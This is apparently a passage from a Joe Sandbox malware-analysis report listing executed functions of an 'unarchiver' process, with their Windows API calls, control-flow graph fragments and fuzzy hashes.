Function_0135B1B4 62 Function_0135AEB2 63 Function_0135AFB2 64 Function_013523BC 65 Function_01690DE0 65->86 66 Function_0135A2AE 67 Function_01352194 68 Function_0135A392 69 Function_016805CF 70 Function_016902C0 70->53 77 Function_016805DF 70->77 106 Function_01690799 70->106 71 Function_0135B49E 72 Function_0135B39E 73 Function_01352098 74 Function_0135A09A 75 Function_0135A486 76 Function_0135A882 78 Function_01690DD1 78->86 79 Function_0135A78F 80 Function_0135AC8E 81 Function_0135AF8B 82 Function_013523F4 83 Function_01690CA8 84 Function_0135A1F4 85 Function_013521F0 87 Function_01690DA2 87->86 88 Function_0135A5FE 89 Function_0135ABE6 90 Function_0135AAE0 91 Function_016805BF 92 Function_016905B1 93 Function_016902B0 93->53 93->77 93->106 94 Function_016807B2 95 Function_016807B6 96 Function_013526EA 97 Function_0135A6D4 98 Function_0135B1D6 99 Function_013520D0 100 Function_01690B8F 101 Function_0135A5DC 102 Function_01680784 103 Function_0135A2DA 104 Function_0135AADA 105 Function_013526C5 106->6 106->24 106->53 106->77 106->83 106->86 106->100 107 Function_01690C99 106->107 108 Function_0135A7C2

                        Executed Functions

                        Function 0135B1D6 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                        Download Yara Rule
                        APIs
                        • GetSystemInfo.KERNELBASE(?), ref: 0135B208
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: InfoSystem
                        • String ID:
                        • API String ID: 31276548-0
                        • Opcode ID: bc536b827f25303fb6b5c7bb77ba86f97c88c91a3bc4774699185fa7bd3ea9a0
                        • Instruction ID: 89eccb80f6973f96bef366a6b16c687193b7486b355cd5a74229f3f70df0b131
                        • Opcode Fuzzy Hash: bc536b827f25303fb6b5c7bb77ba86f97c88c91a3bc4774699185fa7bd3ea9a0
                        • Instruction Fuzzy Hash: 4201F2315042448FEB20CF19D985B65FBE8DF01628F08C4AACD088F606D374A404CBB2
                        Function 0135B246 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 135b246-135b2eb 5 135b343-135b348 0->5 6 135b2ed-135b2f5 DuplicateHandle 0->6 5->6 7 135b2fb-135b30d 6->7 9 135b30f-135b340 7->9 10 135b34a-135b34f 7->10 10->9
                        APIs
                        • DuplicateHandle.KERNELBASE(?,00000E24), ref: 0135B2F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: d8c07be276f1d3025561a6c0e2660160eb3c3e8d37b1a3610be9f2c9384c2fce
                        • Instruction ID: 67aef4a32722b6d14848ae324674b23101405098811c72ccb57cff2516e0d8d5
                        • Opcode Fuzzy Hash: d8c07be276f1d3025561a6c0e2660160eb3c3e8d37b1a3610be9f2c9384c2fce
                        • Instruction Fuzzy Hash: 22319472504344AFE7228B65DC44FA6BFBCEF46214F0488AAE985CB562D374A909CB71
                        Function 0135AD04 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 14 135ad04-135ad9f 19 135adf7-135adfc 14->19 20 135ada1-135ada9 DuplicateHandle 14->20 19->20 22 135adaf-135adc1 20->22 23 135adc3-135adf4 22->23 24 135adfe-135ae03 22->24 24->23
                        APIs
                        • DuplicateHandle.KERNELBASE(?,00000E24), ref: 0135ADA7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 4e193ea8de1ceb6ab9b09367ab42c3db61fdf66a14c63ee068dff90677c3af03
                        • Instruction ID: 2515997f274eab51cc5e3e9957425929307eab934d94387c212e1760e4ffb6ac
                        • Opcode Fuzzy Hash: 4e193ea8de1ceb6ab9b09367ab42c3db61fdf66a14c63ee068dff90677c3af03
                        • Instruction Fuzzy Hash: 3831B7715043446FE7228B65DC44FA7BFECEF45214F0448AAF985CB552D334A909DB71
                        Function 0135AB76 Relevance: 1.6, APIs: 1, Instructions: 94pipeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 28 135ab76-135ac67 CreatePipe
                        APIs
                        • CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 0135AC36
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: CreatePipe
                        • String ID:
                        • API String ID: 2719314638-0
                        • Opcode ID: 258cbd7875395d0c3295769352d4ab065779723f3e0588d4a6af5cae813124d7
                        • Instruction ID: 4601ff308c65b794700b4aebbaaf51501ad3b47458cb5d6eefd5d5acff3a6ccd
                        • Opcode Fuzzy Hash: 258cbd7875395d0c3295769352d4ab065779723f3e0588d4a6af5cae813124d7
                        • Instruction Fuzzy Hash: 0431907250D7C0AFC3138B258C65A65BFB8AF47610F1A84CBD8C4CF5A3D2296919C7B2
                        Function 0135A5DC Relevance: 1.6, APIs: 1, Instructions: 90fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 33 135a5dc-135a656 37 135a658 33->37 38 135a65b-135a667 33->38 37->38 39 135a66c-135a675 38->39 40 135a669 38->40 41 135a677-135a69b CreateFileW 39->41 42 135a6c6-135a6cb 39->42 40->39 45 135a6cd-135a6d2 41->45 46 135a69d-135a6c3 41->46 42->41 45->46
                        APIs
                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0135A67D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 99551d9c7ac0f1253e929d41ba72806168960b10c9bc97386dd1140b041b46d2
                        • Instruction ID: 2eef57de4e2b2b0a7efc6555b8e4182819487cd6a9eba1575ba1c34f440350e8
                        • Opcode Fuzzy Hash: 99551d9c7ac0f1253e929d41ba72806168960b10c9bc97386dd1140b041b46d2
                        • Instruction Fuzzy Hash: FF31CF71504340AFE722CF25DD44F66BFE8EF49624F0888AEE9858B652D375E808DB71
                        Function 0135A120 Relevance: 1.6, APIs: 1, Instructions: 82fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 49 135a120-135a1f3 FindNextFileW
                        APIs
                        • FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0135A1C2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: FileFindNext
                        • String ID:
                        • API String ID: 2029273394-0
                        • Opcode ID: 0760b10f395c1e42ea5af071cbd3713dfbdf2b6a6640d87f098f1ac995314c5b
                        • Instruction ID: a197983a350ef835a104e262b97b6836d3983e4f0174a8f40b89e4371b0cac82
                        • Opcode Fuzzy Hash: 0760b10f395c1e42ea5af071cbd3713dfbdf2b6a6640d87f098f1ac995314c5b
                        • Instruction Fuzzy Hash: 5921A17150D3C06FD3128B258C51BA6BFB4EF47610F0985DBD8848F693D225A919D7A2
                        Function 0135AD2A Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 71 135ad2a-135ad9f 75 135adf7-135adfc 71->75 76 135ada1-135ada9 DuplicateHandle 71->76 75->76 78 135adaf-135adc1 76->78 79 135adc3-135adf4 78->79 80 135adfe-135ae03 78->80 80->79
                        APIs
                        • DuplicateHandle.KERNELBASE(?,00000E24), ref: 0135ADA7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: e484a5a5ebb4673528d6653c57ef9d3129c3fb7f3ff0c75dd3a587b8c2f8bc4d
                        • Instruction ID: 08be523114d6e39da4d7c6eb54ca0b7e237057414d7dd7bc4d235c19ecbf389d
                        • Opcode Fuzzy Hash: e484a5a5ebb4673528d6653c57ef9d3129c3fb7f3ff0c75dd3a587b8c2f8bc4d
                        • Instruction Fuzzy Hash: E221B572500204AFEB319F58DD45FABBBECEF04624F04896AED458BA51D734E5088BB1
                        Function 0135B276 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 84 135b276-135b2eb 88 135b343-135b348 84->88 89 135b2ed-135b2f5 DuplicateHandle 84->89 88->89 90 135b2fb-135b30d 89->90 92 135b30f-135b340 90->92 93 135b34a-135b34f 90->93 93->92
                        APIs
                        • DuplicateHandle.KERNELBASE(?,00000E24), ref: 0135B2F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 919458cd3a2797e92bd64efc019c7221c3172e2eb98124a626ad2f5a3e2a76da
                        • Instruction ID: 8ba7cebbea4a66ce03b7a53005690ece6bcca7016cbbadb71cd8252cf9a03402
                        • Opcode Fuzzy Hash: 919458cd3a2797e92bd64efc019c7221c3172e2eb98124a626ad2f5a3e2a76da
                        • Instruction Fuzzy Hash: 1321B572500304AFEB319F55CD45FAAFBACEF04624F04886AED459B652D774E5088B71
                        Function 0135A370 Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 54 135a370-135a3cf 57 135a3d4-135a3dd 54->57 58 135a3d1 54->58 59 135a3e2-135a3e8 57->59 60 135a3df 57->60 58->57 61 135a3ed-135a404 59->61 62 135a3ea 59->62 60->59 64 135a406-135a419 RegQueryValueExW 61->64 65 135a43b-135a440 61->65 62->61 66 135a442-135a447 64->66 67 135a41b-135a438 64->67 65->64 66->67
                        APIs
                        • RegQueryValueExW.KERNELBASE(?,00000E24,B9EF504B,00000000,00000000,00000000,00000000), ref: 0135A40C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: QueryValue
                        • String ID:
                        • API String ID: 3660427363-0
                        • Opcode ID: 41a680e97322b2cb06bd28c150f76ce41f4d60c554d26dd438e4a98f35595460
                        • Instruction ID: f344ef44f49c6c3add9571feeea0ee68f15a2afc9a6fc053ccddb079e03671bc
                        • Opcode Fuzzy Hash: 41a680e97322b2cb06bd28c150f76ce41f4d60c554d26dd438e4a98f35595460
                        • Instruction Fuzzy Hash: C9218BB2504340AFE721CF55CC84FA6BBFCEF05614F08899AE985CB292D364E908CB71
                        Function 0135A850 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 97 135a850-135a8d6 101 135a8d8-135a8f8 SetFilePointer 97->101 102 135a91a-135a91f 97->102 105 135a921-135a926 101->105 106 135a8fa-135a917 101->106 102->101 105->106
                        APIs
                        • SetFilePointer.KERNELBASE(?,00000E24,B9EF504B,00000000,00000000,00000000,00000000), ref: 0135A8DE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: FilePointer
                        • String ID:
                        • API String ID: 973152223-0
                        • Opcode ID: 288e7cd6fea92e0533c5cf563adc31fb0e39013faee4e438fb7333a64f2130f3
                        • Instruction ID: 53a168568a851d8447026a2b4af77673c08e012050a433d183b0380c8b9e0dff
                        • Opcode Fuzzy Hash: 288e7cd6fea92e0533c5cf563adc31fb0e39013faee4e438fb7333a64f2130f3
                        • Instruction Fuzzy Hash: 7521C4715093806FE7228B54DC44FA6BFB8EF46714F0888EAE9848F553D234A909C771
                        Function 0135A933 Relevance: 1.6, APIs: 1, Instructions: 77fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 109 135a933-135a9b9 113 135a9fd-135aa02 109->113 114 135a9bb-135a9db WriteFile 109->114 113->114 117 135aa04-135aa09 114->117 118 135a9dd-135a9fa 114->118 117->118
                        APIs
                        • WriteFile.KERNELBASE(?,00000E24,B9EF504B,00000000,00000000,00000000,00000000), ref: 0135A9C1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: FileWrite
                        • String ID:
                        • API String ID: 3934441357-0
                        • Opcode ID: 6afc40321a0a41c51bbc9f3ca5ad54ce26a8906e7d7b28657c6d4cb82e70b191
                        • Instruction ID: aac7c74178fb337c1449ee71a4a722e0263f033fc49ec12b10a16625fe370ac1
                        • Opcode Fuzzy Hash: 6afc40321a0a41c51bbc9f3ca5ad54ce26a8906e7d7b28657c6d4cb82e70b191
                        • Instruction Fuzzy Hash: AD21A371409380AFDB22CF65CC44F96BFB8EF46214F08889AE9848F152D375A508CB71
                        Function 0135A5FE Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 121 135a5fe-135a656 124 135a658 121->124 125 135a65b-135a667 121->125 124->125 126 135a66c-135a675 125->126 127 135a669 125->127 128 135a677-135a67f CreateFileW 126->128 129 135a6c6-135a6cb 126->129 127->126 131 135a685-135a69b 128->131 129->128 132 135a6cd-135a6d2 131->132 133 135a69d-135a6c3 131->133 132->133
                        APIs
                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0135A67D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 4373e23cf31e33c3a4fce8f4cae084a380a2dd261d1d16f0224a9a9cd17dcb04
                        • Instruction ID: d0b4b1462b697d0975765d632632cdd272d51d76530e492fd980377901c2aee2
                        • Opcode Fuzzy Hash: 4373e23cf31e33c3a4fce8f4cae084a380a2dd261d1d16f0224a9a9cd17dcb04
                        • Instruction Fuzzy Hash: 0321B071600204AFEB31CF69DD45FA6FBE8EF08624F04896AED458B652E371E408CB71
                        Function 0135A78F Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 136 135a78f-135a80d 140 135a842-135a847 136->140 141 135a80f-135a822 GetFileType 136->141 140->141 142 135a824-135a841 141->142 143 135a849-135a84e 141->143 143->142
                        APIs
                        • GetFileType.KERNELBASE(?,00000E24,B9EF504B,00000000,00000000,00000000,00000000), ref: 0135A815
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID:
                        • API String ID: 3081899298-0
                        • Opcode ID: c1192a9d238b780f2ba4de718d38607ef5326d9a49b47230588b3e40279fbbb4
                        • Instruction ID: c51c80c0378206b6afa545201f84956a20a7f07fc7e0a40626f6ac8e65e07839
                        • Opcode Fuzzy Hash: c1192a9d238b780f2ba4de718d38607ef5326d9a49b47230588b3e40279fbbb4
                        • Instruction Fuzzy Hash: 7C21D5B54093806FE7228B55DC40FA6BFBCEF47714F0884DBE9848B293D264A909D771
                        Function 0135AA0B Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 147 135aa0b-135aa6a 149 135aa6c 147->149 150 135aa6f-135aa75 147->150 149->150 151 135aa77 150->151 152 135aa7a-135aa83 150->152 151->152 153 135aa85-135aaa5 CreateDirectoryW 152->153 154 135aac4-135aac9 152->154 157 135aaa7-135aac3 153->157 158 135aacb-135aad0 153->158 154->153 158->157
                        APIs
                        • CreateDirectoryW.KERNELBASE(?,?), ref: 0135AA8B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: CreateDirectory
                        • String ID:
                        • API String ID: 4241100979-0
                        • Opcode ID: 36c629d19d41a54d6027741d8924909f2bb551e67091f9c2354b0d82e0ed4bc9
                        • Instruction ID: ea5d77d2c392c2b04aa49c3b946899ae06d898e1ecba77d56734c48b3852f312
                        • Opcode Fuzzy Hash: 36c629d19d41a54d6027741d8924909f2bb551e67091f9c2354b0d82e0ed4bc9
                        • Instruction Fuzzy Hash: C121B0715083C05FEB12CB29DC55B92BFE8AF06314F0D85EAE984CB153D225D909CB61
                        Function 0135A392 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 160 135a392-135a3cf 162 135a3d4-135a3dd 160->162 163 135a3d1 160->163 164 135a3e2-135a3e8 162->164 165 135a3df 162->165 163->162 166 135a3ed-135a404 164->166 167 135a3ea 164->167 165->164 169 135a406-135a419 RegQueryValueExW 166->169 170 135a43b-135a440 166->170 167->166 171 135a442-135a447 169->171 172 135a41b-135a438 169->172 170->169 171->172
                        APIs
                        • RegQueryValueExW.KERNELBASE(?,00000E24,B9EF504B,00000000,00000000,00000000,00000000), ref: 0135A40C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: QueryValue
                        • String ID:
                        • API String ID: 3660427363-0
                        • Opcode ID: 889a650fc82f1a7c36dd76c971a907480f97f64c74270ee8fd22e6efd0e9e2f2
                        • Instruction ID: 9735f5c4f79d90abb96cc034ee24882932dee8a1e39cc79ab6fe70fa0143563b
                        • Opcode Fuzzy Hash: 889a650fc82f1a7c36dd76c971a907480f97f64c74270ee8fd22e6efd0e9e2f2
                        • Instruction Fuzzy Hash: A921A1B12002049FE730CE59CC84FA6BBECEF04628F04856AED459B752D770E908DA71
                        Function 0135A962 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 176 135a962-135a9b9 179 135a9fd-135aa02 176->179 180 135a9bb-135a9c3 WriteFile 176->180 179->180 182 135a9c9-135a9db 180->182 183 135aa04-135aa09 182->183 184 135a9dd-135a9fa 182->184 183->184
                        APIs
                        • WriteFile.KERNELBASE(?,00000E24,B9EF504B,00000000,00000000,00000000,00000000), ref: 0135A9C1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: FileWrite
                        • String ID:
                        • API String ID: 3934441357-0
                        • Opcode ID: 5e3b4f2575ddde22aecda0478a10fea34fa5aef898a94caa2e2607f9d96e9110
                        • Instruction ID: e4ca83e6471e83d62813a484f5c0967ad644b6e51bc505a588cf1e578feb29f1
                        • Opcode Fuzzy Hash: 5e3b4f2575ddde22aecda0478a10fea34fa5aef898a94caa2e2607f9d96e9110
                        • Instruction Fuzzy Hash: D511EF72500204AFEB31CF59CD40FAAFBE8EF44728F04896AEE458B651D334A408CBB1
                        Function 0135A882 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                        Download Yara Rule
                        APIs
                        • SetFilePointer.KERNELBASE(?,00000E24,B9EF504B,00000000,00000000,00000000,00000000), ref: 0135A8DE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: FilePointer
                        • String ID:
                        • API String ID: 973152223-0
                        • Opcode ID: 0700c4192fcd7475586f75a60b720e907a6f6395ec53dbb8b9fe5b891ae4a760
                        • Instruction ID: 2c6dd62dee75b173ae77413431331b946a7a47b63f4e709fc26d4fc7fe629d72
                        • Opcode Fuzzy Hash: 0700c4192fcd7475586f75a60b720e907a6f6395ec53dbb8b9fe5b891ae4a760
                        • Instruction Fuzzy Hash: 0111C172500304AFEB31CF58DD45FAAFBE8EF44728F04886AED458B641D374A5088BB2
                        Function 0135A2AE Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNELBASE(?), ref: 0135A30C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: 7ac8fd1fb3030fe6c1002eac234bcac96c1cb0fc2d5ae385bb31d8b5d5f60c9b
                        • Instruction ID: f4f63398809898f96ca394a8a18f558af95a39abd00ebd2a2b6170af41a0b674
                        • Opcode Fuzzy Hash: 7ac8fd1fb3030fe6c1002eac234bcac96c1cb0fc2d5ae385bb31d8b5d5f60c9b
                        • Instruction Fuzzy Hash: 2011A0754093C09FDB238B25DC54A52BFB4DF07624F0985DBDD848F263D275A808DB62
                        Function 0135B1B4 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                        Download Yara Rule
                        APIs
                        • GetSystemInfo.KERNELBASE(?), ref: 0135B208
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: InfoSystem
                        • String ID:
                        • API String ID: 31276548-0
                        • Opcode ID: ca0d34245b26f3b726586f045c2878921acc1e0178238243127f10551e7dafba
                        • Instruction ID: 81198dc7f572931288b63d6a1ec1265c0103a20cd55bc9285fb837acdacbae28
                        • Opcode Fuzzy Hash: ca0d34245b26f3b726586f045c2878921acc1e0178238243127f10551e7dafba
                        • Instruction Fuzzy Hash: B7115A71509380AFDB128F25DC94B56FFA8DF46224F0884EAED858F253D275A908CB72
                        Function 0135AF8B Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: CloseFind
                        • String ID:
                        • API String ID: 1863332320-0
                        • Opcode ID: b5626c03025b86eae4c6e9e48eb338c1b0d1f54aab96a19d4101c9f0118ab2c4
                        • Instruction ID: 385ebe9cf4d33adbd9674d7632134c52a1bc6b415529a7597b5349fef0f68b0b
                        • Opcode Fuzzy Hash: b5626c03025b86eae4c6e9e48eb338c1b0d1f54aab96a19d4101c9f0118ab2c4
                        • Instruction Fuzzy Hash: 6011A0715093C09FDB128B29DC45B52FFF8EF06220F0984DBED858B263D274A848DB61
                        Function 0135AA46 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                        Download Yara Rule
                        APIs
                        • CreateDirectoryW.KERNELBASE(?,?), ref: 0135AA8B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: CreateDirectory
                        • String ID:
                        • API String ID: 4241100979-0
                        • Opcode ID: a81786e71c645b19f2ef2a321e8482dc81e81c361f3fda7437fb7dc658453395
                        • Instruction ID: de0adca5592aed002bd020cbac85e829e82660afbad6c599bc71690b02590c19
                        • Opcode Fuzzy Hash: a81786e71c645b19f2ef2a321e8482dc81e81c361f3fda7437fb7dc658453395
                        • Instruction Fuzzy Hash: 5211A1716002459FFB50CF29D985B66FBD8EF05624F08C5BAED09CB642E734E804CB61
                        Function 0135A7C2 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                        Download Yara Rule
                        APIs
                        • GetFileType.KERNELBASE(?,00000E24,B9EF504B,00000000,00000000,00000000,00000000), ref: 0135A815
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID:
                        • API String ID: 3081899298-0
                        • Opcode ID: 23bf690d5d36bff46dfd7dcc4a077d8537355c09dc534a4c73cab70bfa9dcf23
                        • Instruction ID: a3fdc35cc84059ff04605f92f87a85cbf3a960826021e71b49ebff926b5f9bc4
                        • Opcode Fuzzy Hash: 23bf690d5d36bff46dfd7dcc4a077d8537355c09dc534a4c73cab70bfa9dcf23
                        • Instruction Fuzzy Hash: 2401C471500304AEE7708B09DD45FA6BF9CDF44628F04C466ED058B742D774A9088AB5
                        Function 0135A172 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0135A1C2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: FileFindNext
                        • String ID:
                        • API String ID: 2029273394-0
                        • Opcode ID: 902a22c8474dfaff78a0ba7f9684f60210ccad8072ce1fbd1b908084775c63b8
                        • Instruction ID: 6504263d5a121e4f489cf9c1b7ad7050934f84a44a98da3aaff161002fdc0248
                        • Opcode Fuzzy Hash: 902a22c8474dfaff78a0ba7f9684f60210ccad8072ce1fbd1b908084775c63b8
                        • Instruction Fuzzy Hash: 8101B171600201ABD720DF1ACD45B76FBE8EB88A20F14856AEC089BB41E735F915CBE5
                        Function 0135ABE6 Relevance: 1.5, APIs: 1, Instructions: 47pipeCOMMON
                        Download Yara Rule
                        APIs
                        • CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 0135AC36
                        Memory Dump Source
                        • Source File: 00000000.00000002.2115663188.000000000135A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_135a000_unarchiver.jbxd
                        Similarity
                        • API ID: CreatePipe
                        • String ID:
                        • API String ID: 2719314638-0
                        • Opcode ID: 8b47b78ae4b3d0a12d0060b48605253272c88e801103d3428a10299deaca885a
                        • Instruction ID: d7dab87c7d6057e69f7a6fc5a5d111a3844880a7d272877c2acf62c4d4441765
                        • Opcode Fuzzy Hash: 8b47b78ae4b3d0a12d0060b48605253272c88e801103d3428a10299deaca885a
